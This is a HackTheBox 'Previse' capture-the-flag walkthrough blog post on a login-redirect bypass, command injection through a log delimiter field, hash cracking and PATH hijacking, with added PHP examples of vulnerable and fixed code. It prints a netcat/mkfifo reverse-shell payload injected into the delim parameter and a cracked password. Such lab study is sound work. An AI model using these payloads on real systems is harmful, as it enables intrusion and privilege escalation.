HackTheBox: Previse

midist0xf
5 min read · Jan 9, 2022

ENUMERATION

Nmap tcp full scan

ennemappo.sh 10.10.10.13 ./

The custom nmap script output highlighted the presence of:

  • SSH on port 22: OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
  • web server on port 80: Apache httpd 2.4.29

EXPLOITATION

Visiting http://10.10.11.104 redirects the browser to a login form at /login.php. SQL injection attempts against the form failed.

Content discovery with gobuster revealed some interesting paths, all of which resulted in a redirect to the login page.

gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.11.104 -x php,html,txt

Looking at the /accounts.php response in Burp makes it clear that the page content, which should be visible only to an authenticated user, is served by the web server together with the redirection to /login.php.

To access the page content we need to bypass the redirect: intercept the response to /accounts.php, delete the Location: login.php header and forward it.

Then we can access the page via browser and create a new user.
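The bypass works because the handler keeps rendering after issuing the redirect. The following is an added example, not the Previse source code: it models the /accounts.php handler as a function that returns the response as an array (status, headers, body) instead of printing it, so the leak can be observed without a web server, and includes the check a reviewer would run over proxy output. The session check and the page markup are assumptions.

```php
<?php
// Added example, not the Previse source code. It models the /accounts.php
// redirect bug as a request handler that returns the response as an array
// (status, headers, body) instead of printing it, so the leak can be seen
// without a web server. The session check and the page markup are assumptions.

function is_logged_in(array $session): bool
{
    return isset($session['user_id']);
}

function protected_markup(): string
{
    return "<h1>Create account</h1>\n"
         . "<form method=\"post\" action=\"accounts.php\">...</form>\n";
}

// $fixed = false reproduces the bug: in real PHP, header('Location: ...')
// only queues a header and execution continues, so the protected HTML is
// still written into the body of the 302 response. $fixed = true is the
// equivalent of calling exit right after header().
function handle_accounts(array $session, bool $fixed): array
{
    $response = ['status' => 200, 'headers' => [], 'body' => ''];

    if (!is_logged_in($session)) {
        $response['status'] = 302;
        $response['headers']['Location'] = 'login.php';
        if ($fixed) {
            return $response;      // stop here: empty body, nothing to strip
        }
        // vulnerable: fall through and keep rendering
    }

    $response['body'] = protected_markup();
    return $response;
}

// Defender-side check for proxy or scanner output: a 3xx response that
// carries a body is exactly what a Location-header-stripping bypass feeds on.
function redirect_leaks_content(array $response): bool
{
    return $response['status'] >= 300
        && $response['status'] < 400
        && trim($response['body']) !== '';
}

$anonymous = [];   // constructed: no session, i.e. not logged in

foreach ([0 => 'vulnerable', 1 => 'fixed'] as $fixed => $label) {
    $r = handle_accounts($anonymous, (bool) $fixed);
    printf("%-10s status=%d body_bytes=%d leaks=%s\n",
        $label, $r['status'], strlen($r['body']),
        redirect_leaks_content($r) ? 'yes' : 'no');
}
```

In a real handler the fix is the two-line form `header('Location: login.php'); exit;` (or `die()`), placed before any protected output; the `redirect_leaks_content()` check is the same rule applied to captured responses: any 3xx with a non-empty body deserves a look.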

At /file_logs.php there is a feature that lets the user choose a delimiter and generates a log file with it.

At /files.php a backup of the website source code is available.

The config.php file contains the MySQL database credentials; we take note of them for the privilege escalation phase.

The logs.php file reveals a command injection: the delim parameter of the POST request sent by the browser when the /file_logs.php feature is used is concatenated directly into the command string passed to exec().
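The following is an added example, not Previse's own logs.php. It reproduces the vulnerable pattern described above (a user-controlled delimiter concatenated into an exec() command string) next to two hardened versions: an allow-list plus escapeshellarg(), and a version that does not shell out at all. The command itself, the log path and the allowed delimiters are assumptions.

```php
<?php
// Added example, not Previse's own logs.php. It reproduces the vulnerable
// pattern (a user-controlled delimiter concatenated into an exec() command
// string) next to two hardened versions. The command, the log path and the
// list of allowed delimiters are assumptions.

const LOG_SOURCE = '/var/www/out.log';          // assumed path
const ALLOWED_DELIMS = [',', ';', ' ', '|'];     // assumed allow-list

// VULNERABLE: the delimiter is pasted unquoted into a shell command. Any
// shell metacharacters in $delim become part of the command exec() runs,
// with the privileges of the web server user.
function build_log_command_vulnerable(string $delim): string
{
    return "/usr/bin/tr ',' " . $delim . " < " . LOG_SOURCE;
}

// HARDENED (1): reject anything outside a fixed allow-list, then quote what
// is left with escapeshellarg() so it can only ever be a single argument.
function build_log_command_fixed(string $delim): string
{
    if (!in_array($delim, ALLOWED_DELIMS, true)) {
        throw new InvalidArgumentException('unsupported delimiter');
    }
    return "/usr/bin/tr ',' " . escapeshellarg($delim)
         . ' < ' . escapeshellarg(LOG_SOURCE);
}

// HARDENED (2): do not shell out at all. Swapping a delimiter is string
// work, so do it in PHP and write the result with file_put_contents().
function convert_log_in_php(string $csv, string $delim): string
{
    if (!in_array($delim, ALLOWED_DELIMS, true)) {
        throw new InvalidArgumentException('unsupported delimiter');
    }
    return str_replace(',', $delim, $csv);
}

// Constructed inputs: a legitimate delimiter and one carrying shell syntax.
$inputs = [';', '; id'];
$sample_csv = "2022-01-09,user1,login\n2022-01-09,user2,logout\n";

foreach ($inputs as $delim) {
    echo 'delim=', var_export($delim, true), "\n";
    echo '  vulnerable command: ', build_log_command_vulnerable($delim), "\n";
    try {
        echo '  hardened command:   ', build_log_command_fixed($delim), "\n";
        echo '  in-PHP result:      ',
             str_replace("\n", ' / ', convert_log_in_php($sample_csv, $delim)), "\n";
    } catch (InvalidArgumentException $e) {
        echo '  rejected: ', $e->getMessage(), "\n";
    }
}
```

The allow-list is the important part: escapeshellarg() alone stops the argument from breaking out of the command, but a fixed set of accepted values removes the need to reason about quoting at all, and doing the transformation in PHP removes the shell from the picture entirely.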

This is the normal request sent to generate the log file.

We can inject this payload to get a reverse shell:

; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.13 4444 >/tmp/f

The malicious POST request is the following:

We get a reverse shell as www-data user.

PRIVILEGE ESCALATION

Upgrade the shell with Python, then check whether the MySQL port is listening, since we already have the database user and password.

python -c 'import pty; pty.spawn("/bin/bash")'

Authenticate to the database with the mysql client.

The previse database includes the hashed password of the user m4lwhere.

Looking up the hash format at https://hashcat.net/wiki/doku.php?id=example_hashes, it appears to be md5crypt.

Crack the hash using hashcat with the corresponding hash mode (-m 500).

hashcat -m 500 -a 0 hash /usr/share/wordlists/rockyou.txt

The plaintext password is ilovecody112235!.

We can use the above password to SSH into the target as the m4lwhere user.

The sudo -l output shows that a script can be executed as root without a password.

The script invokes gzip without specifying the absolute path of the binary.

This means that we can place a malicious binary named gzip in a directory of our choice and prepend that directory to the PATH variable, so that it is searched first when the script invokes gzip.

As you can see, the /tmp directory is prepended to PATH. A file named gzip containing a reverse shell is then created there and made executable.

The script therefore runs the malicious binary and a high-privilege reverse shell is obtained.

LESSONS LEARNED

  • Analyze HTTP 3xx responses through an intercepting proxy to look for unexpected content, and where present, bypass the redirect to access it.
  • Concatenating user input into dangerous functions like exec() can lead to RCE.
  • Using relative paths (e.g. gzip) for binaries invoked by scripts executed as a privileged user can lead to privilege escalation via PATH hijacking.
